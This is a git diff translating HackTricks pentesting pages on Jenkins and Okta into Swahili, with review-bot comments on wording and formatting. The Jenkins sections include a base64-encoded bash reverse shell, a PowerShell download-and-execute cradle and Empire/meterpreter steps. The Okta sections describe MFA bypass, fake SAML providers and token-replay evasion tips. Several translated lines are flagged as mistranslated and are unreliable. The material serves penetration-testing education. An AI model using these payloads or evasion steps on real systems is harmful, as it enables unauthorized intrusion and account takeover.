-If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+Ikiwa unaweza kufikia faili ya usanidi ya pipeline fulani iliyowekwa unaweza tu **kuibadilisha kwa kuongeza shell yako ya nyuma** na kisha kuitekeleza au kusubiri hadi itekelezwe.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
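Review bot: the same indentation loss applies to the `pipeline { ... }` block: `agent any`, `stages {`, `stage('Hello') {`, `steps {` and `sh '''` are all at column 0 now, so the nesting of the Jenkinsfile is no longer visible to the reader. Keep the original indentation. Terminology is also inconsistent within this one page: "reverse shell" is left untranslated in "andika **reverse shell**" but becomes "shell yako ya nyuma" in the last paragraph, while the project and Groovy-script pages in this same PR use "shell ya kurudi"; settle on one rendering across the Jenkins pages.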
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
index f16096070..5b849c2d2 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -4,37 +4,33 @@
## Creating a Project
-This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+Hii mbinu ni kelele sana kwa sababu unahitaji kuunda mradi mpya kabisa (dhahiri hii itafanya kazi tu ikiwa mtumiaji wako anaruhusiwa kuunda mradi mpya).
-1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
-2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
-3. Click **Build now**
- 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
- 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`**
+1. **Unda mradi mpya** (mradi wa Freestyle) kwa kubonyeza "New Item" au katika `/view/all/newJob`
+2. Ndani ya sehemu ya **Build** weka **Execute shell** na ubandike launcher ya powershell Empire au powershell ya meterpreter (inaweza kupatikana kwa kutumia _unicorn_). Anza payload na _PowerShell.exe_ badala ya kutumia _powershell._
+3. Bonyeza **Build now**
+1. Ikiwa kitufe cha **Build now** hakionekani, bado unaweza kwenda kwenye **configure** --> **Build Triggers** --> `Build periodically` na kuweka cron ya `* * * * *`
+2. Badala ya kutumia cron, unaweza kutumia config "**Trigger builds remotely**" ambapo unahitaji tu kuweka jina la api token ili kuanzisha kazi. Kisha nenda kwenye wasifu wako wa mtumiaji na **unda API token** (ita jina hili API token kama ulivyoiita api token ili kuanzisha kazi). Hatimaye, anzisha kazi hiyo kwa: **`curl :@/job//build?token=`**
.png>)
## Modifying a Project
-Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+Nenda kwenye miradi na angalia **kama unaweza kuunda** yoyote kati yao (tafuta "Configure button"):
.png>)
-If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+Ikiwa huwezi kuona **kitufe cha** **configuration** basi huwezi **kuunda** labda (lakini angalia miradi yote kwani unaweza kuwa na uwezo wa kuunda baadhi yao na si wengine).
-Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+Au **jaribu kufikia njia** `/job//configure` au `/me/my-views/view/all/job//configure` \_\_ katika kila mradi (mfano: `/job/Project0/configure` au `/me/my-views/view/all/job/Project0/configure`).
## Execution
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+Ikiwa unaruhusiwa kuunda mradi unaweza **kufanya itekeleze amri wakati ujenzi unafanikiwa**:
.png>)
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+Bonyeza **Save** na **ujenge** mradi na **amri yako itatekelezwa**.\
+Ikiwa hufanyi shell ya kurudi bali amri rahisi unaweza **kuona matokeo ya amri ndani ya matokeo ya ujenzi**.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
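Review bot: the two sub-steps under "3. Bonyeza **Build now**" were de-indented, so the lines beginning "1." and "2." now continue the outer ordered list and will render as steps 4 and 5 rather than 3.1 and 3.2; indent them under step 3 as in the original. Separately, "configure" is translated as "kuunda" (to create) throughout this hunk: "kama unaweza kuunda yoyote", "huwezi **kuunda**", "Ikiwa unaruhusiwa kuunda mradi". The verb for configuring is "kusanidi"; as written, the Modifying a Project section tells the reader to check whether they can create projects, which is the opposite of the original point about editing existing ones.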
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
index 33821cc03..6293ff517 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -4,24 +4,21 @@
## Jenkins RCE with Groovy Script
-This is less noisy than creating a new project in Jenkins
-
-1. Go to _path_jenkins/script_
-2. Inside the text box introduce the script
+Hii ni kimya zaidi kuliko kuunda mradi mpya katika Jenkins
+1. Nenda kwenye _path_jenkins/script_
+2. Ndani ya kisanduku cha maandiko ingiza scripti
```python
def process = "PowerShell.exe ".execute()
println "Found text ${process.text}"
```
-
You could execute a command using: `cmd.exe /c dir`
In **linux** you can do: **`"ls /".execute().text`**
If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
-**Another useful groovy script** is (replace \[INSERT COMMAND]):
-
+**Scripti nyingine ya groovy yenye manufaa** ni (replace \[INSERT COMMAND]):
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
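Review bot: this hunk leaves the page half-translated: the three context lines starting "You could execute a command using", "In **linux** you can do" and "If you need to use _quotes_" stay in English between two translated paragraphs, and "(replace \[INSERT COMMAND])" remains English inside the translated sentence. Either translate those paragraphs in this commit or say in the PR that the file is intentionally partial. Minor: the spelling alternates between "scripti" ("ingiza scripti", "**Scripti nyingine**") and "skripti" elsewhere in the PR; pick one.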
@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
-
-### Reverse shell in linux
-
+### Reverse shell katika linux
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
+### Reverse shell katika windows
-### Reverse shell in windows
-
-You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
-
+Unaweza kuandaa seva ya HTTP yenye PS reverse shell na kutumia Jeking kupakua na kuitekeleza:
```python
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc
```
-
### Script
-You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
-
-You can use MSF to get a reverse shell:
+Unaweza kuendesha mchakato huu kwa kutumia [**hiki skripti**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
+Unaweza kutumia MSF kupata shell ya kurudi:
```
msf> use exploit/multi/http/jenkins_script_console
```
-
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
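Review bot: "Jeking" in "kutumia Jeking kupakua" carries the typo over from the English source line; a translation pass is the right moment to correct it to "Jenkins". Also "hiki skripti" should be "hii skripti" ("skripti" is not a ki-/vi- class noun, and the dumping-secrets page in this PR already uses "hizi skripti"), and "kuendesha mchakato huu" means "run this process" where the source says "automate" ("kufanya mchakato huu kuwa wa kiotomatiki"). Unrelated to the translation but visible in the context: the `cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc` line ends with `-Enc` and no argument, so the snippet as shown is incomplete.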
diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
index e682996c2..0f9f8730e 100644
--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -4,103 +4,103 @@
## Basic Information
-[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
+[Okta, Inc.](https://www.okta.com/) inatambuliwa katika sekta ya usimamizi wa utambulisho na ufikiaji kwa ajili ya suluhisho zake za programu za wingu. Suluhisho hizi zimeundwa ili kuboresha na kulinda uthibitishaji wa watumiaji katika programu mbalimbali za kisasa. Zinahudumia si tu kampuni zinazolenga kulinda data zao nyeti bali pia waendelezaji wanaovutiwa na kuunganisha udhibiti wa utambulisho katika programu, huduma za wavuti, na vifaa.
-The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
+Kutoa kuu kutoka Okta ni **Okta Identity Cloud**. Jukwaa hili linajumuisha seti ya bidhaa, ikiwa ni pamoja na lakini sio tu:
-- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
-- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
-- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
-- **Universal Directory**: Enables centralized management of users, groups, and devices.
-- **API Access Management**: Secures and manages access to APIs.
+- **Single Sign-On (SSO)**: Inarahisisha ufikiaji wa mtumiaji kwa kuruhusu seti moja ya akisi za kuingia katika programu nyingi.
+- **Multi-Factor Authentication (MFA)**: Inaboresha usalama kwa kuhitaji aina nyingi za uthibitisho.
+- **Lifecycle Management**: Inafanya mchakato wa kuunda, kuboresha, na kufuta akaunti za watumiaji kuwa wa kiotomatiki.
+- **Universal Directory**: Inaruhusu usimamizi wa kati wa watumiaji, vikundi, na vifaa.
+- **API Access Management**: Inalinda na kusimamia ufikiaji wa APIs.
-These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
+Huduma hizi kwa pamoja zinakusudia kuimarisha ulinzi wa data na kuboresha ufikiaji wa watumiaji, ikiongeza usalama na urahisi. Uwezo wa suluhisho za Okta unafanya kuwa chaguo maarufu katika sekta mbalimbali, zikiwa na manufaa kwa makampuni makubwa, kampuni ndogo, na waendelezaji binafsi. Kufikia sasisho la mwisho mnamo Septemba 2021, Okta inatambuliwa kama chombo muhimu katika eneo la Usimamizi wa Utambulisho na Ufikiaji (IAM).
> [!CAUTION]
-> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
+> Lengo kuu la Okta ni kuunda ufikiaji kwa watumiaji na vikundi tofauti kwa programu za nje. Ikiwa utaweza **kudhoofisha haki za msimamizi katika mazingira ya Oktas**, kuna uwezekano mkubwa wa **kudhoofisha majukwaa mengine yote ambayo kampuni inatumia**.
> [!TIP]
-> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
+> Ili kufanya ukaguzi wa usalama wa mazingira ya Okta unapaswa kuomba **ufikiaji wa msimamizi wa kusoma tu**.
### Summary
-There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
-These users can be inside **groups**.\
-There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
+Kuna **watumiaji** (ambao wanaweza **kuhifadhiwa katika Okta,** kuingia kutoka kwa **Watoa Utambulisho** waliowekwa au kuthibitishwa kupitia **Active Directory** au LDAP).\
+Watumiaji hawa wanaweza kuwa ndani ya **vikundi**.\
+Kuna pia **wauthentikishaji**: chaguzi tofauti za kuthibitisha kama nywila, na 2FA kadhaa kama WebAuthn, barua pepe, simu, okta verify (zinaweza kuwa zimewezeshwa au kuzuiliwa)...
-Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+Kisha, kuna **programu** zilizounganishwa na Okta. Kila programu itakuwa na **ramani fulani na Okta** ili kushiriki habari (kama anwani za barua pepe, majina ya kwanza...). Aidha, kila programu lazima iwe ndani ya **Sera ya Uthibitishaji**, ambayo inaonyesha **wauthentikishaji wanaohitajika** kwa mtumiaji ili **kuingia** kwenye programu.
> [!CAUTION]
-> The most powerful role is **Super Administrator**.
+> Nafasi yenye nguvu zaidi ni **Super Administrator**.
>
-> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
+> Ikiwa mshambuliaji atakudhoofisha Okta kwa ufikiaji wa Msimamizi, programu zote **zinazoamini Okta** zitakuwa na uwezekano mkubwa wa **kudhoofishwa**.
## Attacks
### Locating Okta Portal
-Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
+Kawaida, lango la kampuni litakuwa katika **companyname.okta.com**. Ikiwa sivyo, jaribu **mabadiliko rahisi** ya **companyname.** Ikiwa huwezi kulipata, pia inawezekana kwamba shirika lina rekodi ya **CNAME** kama **`okta.companyname.com`** ikielekeza kwenye **Okta portal**.
### Login in Okta via Kerberos
-If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
+Ikiwa **`companyname.kerberos.okta.com`** inafanya kazi, **Kerberos inatumika kwa ufikiaji wa Okta**, kawaida ikiepuka **MFA** kwa watumiaji wa **Windows**. Ili kupata watumiaji wa Okta walioidhinishwa na Kerberos katika AD, endesha **`getST.py`** na **parameta zinazofaa**. Baada ya kupata **tiketi ya mtumiaji wa AD**, **ingiza** kwenye mwenyeji aliye na udhibiti kwa kutumia zana kama Rubeus au Mimikatz, kuhakikisha **`clientname.kerberos.okta.com` iko katika eneo la "Intranet" la Chaguzi za Mtandao**. Kufikia URL maalum kunapaswa kurudisha jibu la JSON "OK", ikionyesha kukubaliwa kwa tiketi ya Kerberos, na kutoa ufikiaji wa dashibodi ya Okta.
-Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
+Kudhoofisha **akaunti ya huduma ya Okta na SPN ya uwakilishi inaruhusu shambulio la Silver Ticket.** Hata hivyo, matumizi ya Okta ya **AES** kwa ajili ya usimbaji wa tiketi yanahitaji kuwa na ufunguo wa AES au nywila ya wazi. Tumia **`ticketer.py` kutengeneza tiketi kwa mtumiaji wa mwathirika** na kuisambaza kupitia kivinjari ili kuthibitisha na Okta.
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking Okta AD Agent
-This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
+Teknolojia hii inahusisha **kupata Okta AD Agent kwenye seva**, ambayo **inasawazisha watumiaji na kushughulikia uthibitishaji**. Kwa kuchunguza na kufichua mipangilio katika **`OktaAgentService.exe.config`**, hasa AgentToken kwa kutumia **DPAPI**, mshambuliaji anaweza kwa urahisi **kukamata na kubadilisha data za uthibitishaji**. Hii inaruhusu si tu **kuangalia** na **kukamata akisi za mtumiaji** kwa wazi wakati wa mchakato wa uthibitishaji wa Okta bali pia **kujibu majaribio ya uthibitishaji**, hivyo kuruhusu ufikiaji usioidhinishwa au kutoa uthibitishaji wa ulimwengu wote kupitia Okta (kama funguo ya 'skeleton').
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking AD As an Admin
-This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
+Teknolojia hii inahusisha kudhibiti Okta AD Agent kwa kwanza kupata OAuth Code, kisha kuomba token ya API. Token hiyo inahusishwa na eneo la AD, na **kiunganishi kinaitwa kuanzisha wakala wa AD wa uwongo**. Kuanzisha kunaruhusu wakala **kushughulikia majaribio ya uthibitishaji**, kukamata akisi kupitia API ya Okta. Zana za kiotomatiki zinapatikana ili kurahisisha mchakato huu, zikitoa njia rahisi ya kukamata na kushughulikia data za uthibitishaji ndani ya mazingira ya Okta.
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Okta Fake SAML Provider
-**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
+**Angalia shambulio katika** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
-The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
+Teknolojia hii inahusisha **kuanzisha mtoa huduma wa SAML wa uwongo**. Kwa kuunganisha Mtoa Utambulisho wa nje (IdP) ndani ya mfumo wa Okta kwa kutumia akaunti yenye mamlaka, washambuliaji wanaweza **kudhibiti IdP, wakikubali ombi lolote la uthibitishaji kwa mapenzi yao**. Mchakato huu unajumuisha kuanzisha IdP ya SAML 2.0 katika Okta, kubadilisha URL ya SSO ya IdP kwa ajili ya kuelekeza kupitia faili ya wenyeji wa ndani, kutengeneza cheti kilichojisajili, na kuunda mipangilio ya Okta ili kulinganisha na jina la mtumiaji au barua pepe. Kutekeleza hatua hizi kwa mafanikio kunaruhusu uthibitishaji kama mtumiaji yeyote wa Okta, bila kuhitaji akisi za mtumiaji binafsi, na kuongeza udhibiti wa ufikiaji kwa njia ambayo inaweza kutokewa.
### Phishing Okta Portal with Evilgnix
-In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
+Katika [**hiki kipande cha blogi**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) inaelezwa jinsi ya kuandaa kampeni ya phishing dhidi ya lango la Okta.
### Colleague Impersonation Attack
-The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
+**Sifa ambazo kila mtumiaji anaweza kuwa nazo na kubadilisha** (kama barua pepe au jina la kwanza) zinaweza kuundwa katika Okta. Ikiwa **programu** inakubali kama ID **sifa** ambayo mtumiaji anaweza **kubadilisha**, ataweza **kujifanya kuwa watumiaji wengine katika jukwaa hilo**.
-Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
+Hivyo basi, ikiwa programu inakubali uwanja wa **`userName`**, huenda usiweze kuubadilisha (kwa sababu huwezi kubadilisha uwanja huo), lakini ikiwa inakubali kwa mfano **`primaryEmail`** unaweza kuwa na uwezo wa **kuubadilisha kuwa anwani ya barua pepe ya mwenzako** na kujifanya (utahitaji kuwa na ufikiaji wa barua pepe na kukubali mabadiliko).
-Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
-Therefore, the app should have this field enabled if it exists:
+Kumbuka kwamba hii kujifanya inategemea jinsi kila programu ilivyoundwa. Ni zile tu zinazokubali uwanja uliohubadilishwa na kukubali masasisho zitakazodhuriwa.\
+Hivyo basi, programu inapaswa kuwa na uwanja huu umewezeshwa ikiwa upo:
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
+Nimeona pia programu nyingine ambazo zilikuwa na udhaifu lakini hazikuwa na uwanja huo katika mipangilio ya Okta (mwishowe programu tofauti zimeundwa tofauti).
-The best way to find out if you could impersonate anyone on each app would be to try it!
+Njia bora ya kujua ikiwa unaweza kujifanya kuwa mtu yeyote kwenye kila programu itakuwa kujaribu!
## Evading behavioural detection policies
-Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page.
+Sera za kugundua tabia katika Okta zinaweza kuwa hazijulikani hadi zipatikane, lakini **kuzipita** kunaweza kufanywa kwa **kulenga programu za Okta moja kwa moja**, kuepuka dashibodi kuu ya Okta. Kwa kutumia **token ya ufikiaji wa Okta**, rudia token hiyo kwenye **URL maalum ya Okta ya programu** badala ya ukurasa kuu wa kuingia.
-Key recommendations include:
+Mapendekezo muhimu ni pamoja na:
-- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens.
-- Ensure **consistent user-agent strings** between the client and replayed access tokens.
-- **Refrain from replaying** tokens from different users from the same IP address.
-- Exercise caution when replaying tokens against the Okta dashboard.
-- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic.
+- **Epuka kutumia** proxies maarufu za anonymizer na huduma za VPN unapofanya kurudiwa kwa token za ufikiaji zilizokamatwa.
+- Hakikisha **nyuzi za mtumiaji zinazofanana** kati ya mteja na token za ufikiaji zilizorejeshwa.
+- **Epuka kurudi token** kutoka kwa watumiaji tofauti kutoka anwani moja ya IP.
+- Fanya makini unapofanya kurudi token dhidi ya dashibodi ya Okta.
+- Ikiwa unajua anwani za IP za kampuni ya mwathirika, **punguza trafiki** kwa hizo IP au anuwai yao, ukizuia trafiki nyingine zote.
## Okta Hardening
-Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible:
+Okta ina mipangilio mingi inayowezekana, katika ukurasa huu utapata jinsi ya kuzikagua ili ziwe salama kadri inavyowezekana:
{{#ref}}
okta-hardening.md
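Review bot: in the "Key recommendations" bullets, "user-agent strings" became "nyuzi za mtumiaji" (user threads) and "replaying"/"replayed" became "kurudi"/"kurudiwa"/"zilizorejeshwa" (returning), which changes the OPSEC guidance a reader is meant to follow; keep `User-Agent` as the literal HTTP header name and use one verb for replay across all five bullets and the paragraph above them (which already uses "rudia"). Suggest `- Hakikisha **User-Agent strings zinazofanana** kati ya mteja na token za ufikiaji zinazorudiwa.` and `- **Epuka kurudia token** kutoka kwa watumiaji tofauti kutoka anwani moja ya IP.`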
@@ -112,7 +112,3 @@ okta-hardening.md
- [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md
index a7dac96a7..e97f7d5d2 100644
--- a/src/pentesting-ci-cd/okta-security/okta-hardening.md
+++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md
@@ -6,72 +6,72 @@
### People
-From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs).
+Kutoka kwa mtazamo wa washambuliaji, hii ni ya kuvutia sana kwani utaweza kuona **watumiaji wote waliojiandikisha**, anwani zao za **barua pepe**, **makundi** wanayoshiriki, **profaili** na hata **vifaa** (simu za mkononi pamoja na mifumo yao ya uendeshaji).
-For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**".
+Kwa ukaguzi wa whitebox hakikisha kuwa hakuna "**Hatua ya mtumiaji inayosubiri**" na "**Kurekebisha nenosiri**".
### Groups
-This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\
-It's possible to see the **people included inside groups** and **apps assigned** to each group.
+Hapa ndipo unapata makundi yote yaliyoanzishwa katika Okta. Ni ya kuvutia kuelewa makundi tofauti (seti ya **idhini**) ambayo yanaweza kutolewa kwa **watumiaji**.\
+Inawezekana kuona **watu walio ndani ya makundi** na **programu zilizotengwa** kwa kila kundi.
-Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members.
+Kwa kweli, kundi lolote lenye jina la **admin** ni la kuvutia, hasa kundi la **Wasimamizi wa Kimataifa,** angalia wanachama kujua ni nani wanachama wenye mamlaka zaidi.
-From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3).
+Kutoka kwa ukaguzi wa whitebox, **hakupaswi kuwa na wasimamizi wa kimataifa zaidi ya 5** (ni bora ikiwa kuna 2 au 3 tu).
### Devices
-Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not.
+Pata hapa **orodha ya vifaa vyote** vya watumiaji wote. Unaweza pia kuona ikiwa inasimamiwa **kwa ufanisi** au la.
### Profile Editor
-Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**.
+Hapa inawezekana kuona jinsi taarifa muhimu kama vile majina ya kwanza, majina ya mwisho, barua pepe, majina ya mtumiaji... zinavyoshirikiwa kati ya Okta na programu nyingine. Hii ni ya kuvutia kwa sababu ikiwa mtumiaji anaweza **kubadilisha katika Okta uwanja** (kama jina lake au barua pepe) ambayo kisha inatumika na **programu ya nje** ili **kutambua** mtumiaji, mtu wa ndani anaweza kujaribu **kuchukua akaunti nyingine**.
-Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it).
+Zaidi ya hayo, katika profaili **`User (default)`** kutoka Okta unaweza kuona **ni viwanja gani** kila **mtumiaji** ana na ni vipi **vinavyoweza kuandikwa** na watumiaji. Ikiwa huwezi kuona paneli ya admin, nenda tu **sasisha taarifa za profaili yako** na utaona ni viwanja gani unaweza kusasisha (kumbuka kuwa ili kusasisha anwani ya barua pepe utahitaji kuithibitisha).
### Directory Integrations
-Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories.
+Maktaba zinakuwezesha kuingiza watu kutoka vyanzo vilivyopo. Nadhani hapa utaona watumiaji waliingizwa kutoka maktaba nyingine.
-I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**.
+Sijawahi kuona, lakini nadhani hii ni ya kuvutia kugundua **maktaba nyingine ambazo Okta inatumia kuingiza watumiaji** ili ikiwa **utavunja maktaba hiyo** unaweza kuweka baadhi ya thamani za sifa katika watumiaji walioundwa katika Okta na **labda kuathiri mazingira ya Okta**.
### Profile Sources
-A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time.
+Chanzo cha profaili ni **programu inayofanya kazi kama chanzo cha ukweli** kwa sifa za profaili za mtumiaji. Mtumiaji anaweza tu kutolewa na programu au maktaba moja kwa wakati mmoja.
-I haven't seen it, so any information about security and hacking regarding this option is appreciated.
+Sijawahi kuona, hivyo taarifa yoyote kuhusu usalama na uhalifu kuhusu chaguo hili inathaminiwa.
## Customizations
### Brands
-Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know).
+Angalia katika tab ya **Domains** ya sehemu hii anwani za barua pepe zinazotumika kutuma barua pepe na jina la kikoa maalum ndani ya Okta la kampuni (ambalo huenda tayari unalijua).
